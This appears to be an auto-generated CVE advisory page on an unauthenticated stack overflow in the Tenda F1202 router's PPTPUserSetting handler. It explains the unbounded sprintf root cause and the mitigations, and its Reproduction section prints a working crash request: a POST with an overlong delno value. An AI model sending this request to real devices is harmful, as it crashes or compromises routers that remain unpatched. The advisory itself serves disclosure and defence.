Tenda F1202 PPTPUserSetting fromPPTPUserSetting stack-based overflow
Description
A vulnerability has been found in Tenda F1202 1.2.0.20(408). Affected is the function fromPPTPUserSetting of the file /goform/PPTPUserSetting. Such manipulation of the argument delno leads to stack-based buffer overflow. The attack may be performed from remote. The exploit has been disclosed to the public and may be used.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stack-based buffer overflow in Tenda F1202 router's fromPPTPUserSetting function allows remote unauthenticated attackers to cause denial of service or remote code execution.
Vulnerability
A stack-based buffer overflow vulnerability exists in the fromPPTPUserSetting function of the Tenda F1202 router firmware version 1.2.0.20(408). The function processes the delno parameter from a POST request to the /goform/PPTPUserSetting endpoint. The parameter is copied into a stack buffer via sprintf without any length check, leading to a buffer overflow [1].
Exploitation
An attacker can exploit this vulnerability by sending a crafted POST request to the vulnerable endpoint with an excessively long delno value. No authentication is required, as the endpoint is exposed on the router's web interface. The proof-of-concept provided in [1] demonstrates sending a long string of 'a' characters. The attack can be performed remotely over the network.
Impact
Successful exploitation can result in denial of service (crash of the httpd process) or potentially remote code execution with the privileges of the httpd service. An attacker could gain full control over the affected device, leading to complete compromise of network traffic and device functionality [1].
Mitigation
As of the publication date, no official patch has been released by Tenda. Users should monitor the vendor's website [2] for firmware updates. Until a fix is available, restrict access to the router's web interface to trusted networks only and disable remote management features if possible.
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing length check in `fromPPTPUserSetting` allows unbounded `sprintf` copy of the `delno` parameter into a fixed stack buffer."
Attack vector
An unauthenticated attacker sends a crafted POST request to `/goform/PPTPUserSetting` with an overly long `delno` parameter. The `fromPPTPUserSetting` function copies this value into a stack buffer via `sprintf` without bounds checking, overflowing the buffer [ref_id=1]. The attack is performed remotely over HTTP and requires no prior authentication. The PoC demonstrates sending 876 bytes of 'a' characters in the `delno` field to trigger the overflow [ref_id=1].
Affected code
The vulnerable function is `fromPPTPUserSetting` in the file `/goform/PPTPUserSetting` of the Tenda F1202 firmware version 1.2.0.20(408). The function reads the user-supplied `delno` parameter and passes it through intermediate variables (`s_1`, `s_3`) to `sprintf` without any length check, causing a stack-based buffer overflow on the stack buffer `s__1` [ref_id=1].
What the fix does
No patch is provided in the bundle. The advisory identifies that the root cause is the use of `sprintf` without a length check when copying the `delno` parameter into a stack buffer [ref_id=1]. To remediate, the vendor should replace the unbounded `sprintf` call with a bounded copy function (e.g., `snprintf`) or validate the length of `delno` before copying it to the stack buffer.
Preconditions
- networkAttacker must be able to send HTTP POST requests to the target device on the local network (typically 192.168.x.x).
- authNo authentication is required; the vulnerable endpoint is accessible without valid credentials.
Reproduction
Send the following POST request to the target device:
``` POST /goform/PPTPUserSetting HTTP/1.1 Host: 192.168.6.2 Content-Length: 876
delno=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ```
The long `delno` value overflows the stack buffer, causing a denial of service or potentially remote code execution [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
5- github.com/Litengzheng/vuldb_new2/blob/main/F1202/vul_29/README.mdmitreexploit
- vuldb.com/submit/813911mitrethird-party-advisory
- vuldb.com/vuln/365409mitrevdb-entrytechnical-description
- vuldb.com/vuln/365409/ctimitresignaturepermissions-required
- www.tenda.com.cnmitreproduct
News mentions
0No linked articles in our index yet.